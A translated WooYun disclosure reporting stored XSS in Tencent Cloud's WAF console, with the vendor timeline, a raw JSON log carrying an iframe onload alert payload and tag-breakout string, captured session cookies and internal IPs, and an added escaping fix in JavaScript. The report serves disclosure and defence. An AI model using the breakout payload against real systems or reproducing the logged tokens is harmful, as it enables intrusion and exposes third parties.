Vulnerability summary

Defect ID: wooyun-2014-088723

Vulnerability title: XSS in the Tencent Cloud WAF security protection console

Affected vendor: Tencent

Reporter: bingfeng

Submitted: 2014-12-26 10:20

Fixed: 2015-02-09 10:22

Disclosed: 2015-02-09 10:22

Vulnerability type: XSS (cross-site scripting)

Severity: Low

Self-assessed Rank: 2

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-12-26: Details sent to the vendor; awaiting vendor handling
2014-12-26: Vendor confirmed; details disclosed to the vendor only
2015-01-05: Details disclosed to core white hats and domain experts
2015-01-15: Details disclosed to regular white hats
2015-01-25: Details disclosed to intern white hats
2015-02-09: Details disclosed to the public

Brief description:

An attacker who attacks a target's Tencent Cloud service can embed an XSS payload in the submitted request data. When the site administrator logs in to the Tencent Cloud console and views the attack details, the XSS fires.

Detailed description:

An attacker who attacks a target's Tencent Cloud service can embed an XSS payload in the submitted request data. When the site administrator logs in to the Tencent Cloud console and views the attack details, the XSS fires.
By constructing an iframe, the attacker can have the XSS code load automatically and pop an alert.

Proof of vulnerability:

Screenshots: 1.png, 2.png, 3.jpg

The JSON data returned for the request is as follows:

{"result":"ok","data":{"req_detail":"GET \/.svn\/entries HTTP\/1.1<br\/>Host: 182.254.143.151<br\/>Accept: *\/*<br\/>Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7<br\/>Accept-Language: zh-cn, zh<br\/>User-Agent: Mozilla\/4.0<br\/>Connection: close<br\/><br\/>68D064E9E569B3090E7A92EDC80A7D02603601F56C0953CFE7534B85B4686AB21B263AEF41F507757D0846624D5F69450C3F8D58D2D60AF3564A8E15D1CE4636E5CC6175CD3963C52764169F0533E3D0D87B56A1560951640D9F77D62805834B288EBAFE5E2E04F7BC6A22D0F745EDCDA2AB525E7D93874175930FC1D6500E842CD5A45EE78EF6CC1AB3F501BD879C2DB7EF2CBC7DFF7CEFE806F75D63FD08E73FFA1BE3A0C5BD1044D85E715698A61B63CE5DFDCFEB66&loginParam=1'%22%3E%3C\/title%3E%3C\/textarea%3E%3C\/xmp%3E%3C\/iframe%3E%3C\/noscript%3E%3C\/noframes%3E%3C\/plaintext%3E%3C\/form%3E%3C\/script%3E%3Ciframe\/onload=alert(\/xss\/)%3E%3C\/iframe%3E&length=34&lengh=34&sessionKey=AA1755F84BAD99468EA5381258B1A0E7BD29A12F43E09C7CDB485F8251CF357C927A0C86FE9BC128085A7B44CE8385B87AC635EF135CB51A9068D064E9E569B3090E7A92EDC80A7D02603601F56C0953CFE7534B85B4686A59956FDDAD518EB2 HTTP\/1.0<br\/>Host:panshi.isd.com<br\/>X-Real-IP:10.166.4.166<br\/>X-Forwarded-For:10.166.4.166<br\/>Connection:close<br\/>Tencent-LeakScan:TST(Tencent Security Team)<br\/>Realip:10.137.146.143<br\/>User-Agent:Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/534.34 (KHTML, like Gecko) Qt\/4.8.2 Safari\/534.34<br\/>Accept:text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<br\/>Cookie:ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2205bf5807aa6190c6095029ca9dac8327%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2210.204.135.40%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A93%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%29+AppleWebKit%2F534.34+%28KHTML%2C+like+Gecko%29+Qt%2F4.8.2+Safari%2F534.34%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1419461604%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D01b3e25a0ffeacd88fadeb21a10fa76a; PHPSESSID=19spr7fif2pg7i3o6trpmelng6<br\/>Accept-Encoding:gzip<br\/>Accept-Language:en,*<br\/><br\/>=88&arrs2[]=90&arrs2[]=104&arrs2[]=98&arrs2[]=67&arrs2[]=104&arrs2[]=105&arrs2[]=89&arrs2[]=88&arrs2[]=78&arrs2[]=108&arrs2[]=78&arrs2[]=106&arrs2[]=82&arrs2[]=102&arrs2[]=90&arrs2[]=71&arrs2[]=86&arrs2[]=106&arrs2[]=98&arrs2[]=50&arrs2[]=82&arrs2[]=108&arrs2[]=75&arrs2[]=67&arrs2[]=82&arrs2[]=102&arrs2[]=85&arrs2[]=107&arrs2[]=86&arrs2[]=82&arrs2[]=86&arrs2[]=85&arrs2[]=86&arrs2[]=84&arrs2[]=86&arrs2[]=70&arrs2[]=116&arrs2[]=54&arrs2[]=77&arrs2[]=70&arrs2[]=48&arrs2[]=112&arrs2[]=75&arrs2[]=81&arrs2[]=61&arrs2[]=61&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=44&arrs2[]=48&arrs2[]=41&arrs2[]=59&arrs2[]=125&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0 HTTP\/1.1<br\/>Accept: *\/*<br\/>Accept-Language: zh-cn<br\/>User-Agent: Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\/5.0)<br\/>Host: zhuyi.cn<br\/><br\/>%B5%AA%E7%9A%84%E7%AC%AC%E5%8D%81%E4%B8%89%E7%AB%A0%E5%88%B0%E5%8D%81%E4%BA%94%E7%AB%A0%E8%A7%81%E5%8D%8E.html'%20target=_blank%3E%E6%9F%A5%E7%9C%8B%E5%85%A8%E6%96%87%3C\/a%3E%3Cbr%3E2014-02-01%3C\/h4%3E%3Cbr%20\/%3E%3Cbr%20\/%3E%3Ch3%20class='B%20U'%3E%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8%E5%80%A9%E7%9A%84%E6%B2%89%E6%B2%A6%E3%80%91%E7%AC%AC%E5%9B%9B%E7%AB%A0%E3%80%81%E6%B2%89%E6%B2%A6%E4%B8%8E%E6%8A%97%E4%BA%89(%E4%B8%87%E5%AD%97%E6%9B%B4%E6%96%B0)5200%7C%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8%E3%80%82%E3%80%82%E3%80%82%3C\/h3%3E%E5%B0%8F%E8%AF%B4%E4%B9%A6%E5%90%8D:%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8%E5%80%A9%E7%9A%84%E6%B2%89%E6%B2%A6%E3%80%91%E7%AC%AC%E5%9B%9B%E7%AB%A0%E3%80%81%E6%B2%89%E6%B2%A6%E4%B8%8E%E6%8A%97%E4%BA%89(%E4%B8%87%E5%AD%97%E6%9B%B4%E6%96%B0)%20%E8%83%8C%E6%99%AF%E9%A2%9C%E8%89%B2:%20%E5%AD%97%E4%BD%93%E9%A2%9C%E8%89%B2%E3%80%82%E3%80%82%E3%80%82%20%E6%98%AF%E4%B8%80%E9%83%A8%E4%BC%98%E7%A7%80%E7%9A%84%E7%BA%A2%E7%81%AF%E6%BF%80%E6%83%85%E5%8C%BA%E5%B0%8F%E8%AF%B4%E3%80%82%E4%BC%9A%E5%91%98%E8%BD%AC%E8%BD%BD%E5%8F%AA%E6%98%AF%E4%B8%BA%E4%BA%86%E5%AE%A3%E4%BC%A0%E6%9C%AC%E4%B9%A6%E8%AE%A9%E6%9B%B4%E5%A4%9A%E8%AF%BB%E8%80%85%E5%88%86%E4%BA%AB,%E5%A6%82%E6%9E%9C%E4%BD%9C%E8%80%85%E4%B8%8D%E3%80%82%E3%80%82%E3%80%82%3Cbr%20\/%3E%3Cbr%20\/%3E%3Ch4%20class='FloatRight%20TextRight'%3E%3Ca%20href='detail%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8%E5%80%A9%E7%9A%84%E6%B2%89%E6%B2%A6%E3%80%91%E7%AC%AC%E5%9B%9B%E7%AB%A0%E3%80%81%E6%B2%89%E6%B2%A6%E4%B8%8E%E6%8A%97%E4%BA%89%E4%B8%87%E5%AD%97%E6%9B%B4%E6%96%B05200%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8.html'%20target=_blank%3E%E6%9F%A5%E7%9C%8B%E5%85%A8%E6%96%87%3C\/a%3E%3Cbr%3E2014-02-06%3C\/h4%3E%3Cbr%20\/%3E%3Cbr%20\/%3E%3C\/div%3E%3Cbr%20\/%3E%3Cscript%20type= HTTP\/1.0<br\/>User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/536.11 (KHTML, like Gecko) Chrome\/20.0.1132.57 Safari\/536.11<br\/>Accept: *\/*<br\/>Referer: http:\/\/www.jiajiao-edu.com\/news\/det%E4%BA%BA%E5%A6%BB%E5%91%A8%E5%80%A9%E7%9A%84%E6%B2%89%E6%B2%A6115%E7%AB%A0%E5%A4%96%E7%AF%87%E4%BD%9C%E8%80%85%E9%BE%99%E5%B0%8F%E4%BE%A0txt%E9%A6%99%E8%89%B3%E5%B0%8F%E8%AF%B4%E6%A2%A6%E7%8E%8B%E6%9C%9D-1-20.html<br\/>Cookie: safedog-flow-item=F844E7985FAE873AA5FB0C5917F2DB99<br\/>Accept-Encoding: gzip<br\/>Accept-Language: en-US,*<br\/>Host: www.jiajiao-edu.com<br\/>Cache-Control: max-age=259200<br\/>Connection: keep-alive<br\/><br\/>1044D85E715698A61B63CE5DFDCFEB66&loginParam=1'\"><\/title><\/textarea><\/xmp><\/iframe><\/noscript><\/noframes><\/plaintext><\/form><\/script><iframe\/onload=alert(\/xss\/)><\/iframe>&length=34&lengh=34&sessionKey=AA1755F84BAD99468EA5381258B1A0E7BD29A12F43E09C7CDB485F8251CF357C927A0C86FE9BC128085A7B44CE8385B87AC635EF135CB51A9068D064E9E569B3090E7A92EDC80A7D02603601F56C0953CFE7534B85B4686A59956FDDAD518EB2"}}


Because a day's test traffic only shows up in the console the following day, no deeper testing was carried out.

Fix recommendation:

HTML-escape the logged request data (the req_detail field) before rendering it in the console, so that tags in attacker-controlled requests are displayed as text rather than interpreted as markup.
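The following is an added illustration of that fix, written for this edit; it is not Tencent Cloud's console code. It assumes, from the JSON above, that the backend joins request lines with the literal token `<br/>` and that everything between those tokens is raw attacker-controlled request data. The sample request and the `example.invalid` host are constructed.

```javascript
// Added example, not Tencent Cloud's console code. It shows why rendering the
// WAF's req_detail field through innerHTML fires the payload from this report,
// and how HTML-escaping each line neutralises it.
//
// Assumption: the backend joins request lines with the literal token "<br/>"
// (as in the JSON above). Everything between those tokens is raw, attacker-
// controlled request data and must be treated as text, never as markup.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Escape the five characters that let text break out of an HTML text context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the string is handed straight to element.innerHTML, so
// an attacker's "<iframe/onload=...>" inside the logged request becomes a live
// element in the administrator's browser.
function renderUnsafe(reqDetail) {
  return reqDetail; // i.e. detailElement.innerHTML = reqDetail;
}

// Hardened pattern: split on the separator the backend controls, escape every
// line as text, and rejoin with a <br> that we emit ourselves. The only tags in
// the result are the ones this function wrote.
function renderSafe(reqDetail) {
  return reqDetail
    .split('<br/>')
    .map(escapeHtml)
    .join('<br>');
}

// Does the rendered HTML contain any element other than our own <br>?
// (Demo check only; a real console should never build HTML from input at all.)
function hasForeignTag(html) {
  return /<(?!br>)[a-z]/i.test(html);
}

// Constructed sample, modelled on (and shortened from) the request in the
// report; the host name is a placeholder.
const SAMPLE_REQ_DETAIL =
  'GET /login?loginParam=1\'"><iframe/onload=alert(/xss/)></iframe> HTTP/1.0<br/>' +
  'Host: example.invalid<br/>' +
  'User-Agent: Mozilla/5.0<br/>';

console.log('unsafe render contains live markup:', hasForeignTag(renderUnsafe(SAMPLE_REQ_DETAIL)));
console.log('safe render:', renderSafe(SAMPLE_REQ_DETAIL));
```

In a real console the strongest variant avoids HTML strings entirely: create one text node per line with `document.createTextNode` and insert `document.createElement('br')` between them, so there is no string for the browser to parse as markup. The string-building form above is used only so the example runs outside a browser.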

Copyright notice: when reposting, please credit the source: bingfeng@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-12-26 11:21

Vendor reply:

Thank you very much for your report. We have started handling the issue, and we thank everyone for their attention to the security of Tencent's services. If you have any questions, please let us know and a dedicated person will follow up.

Latest status:

None yet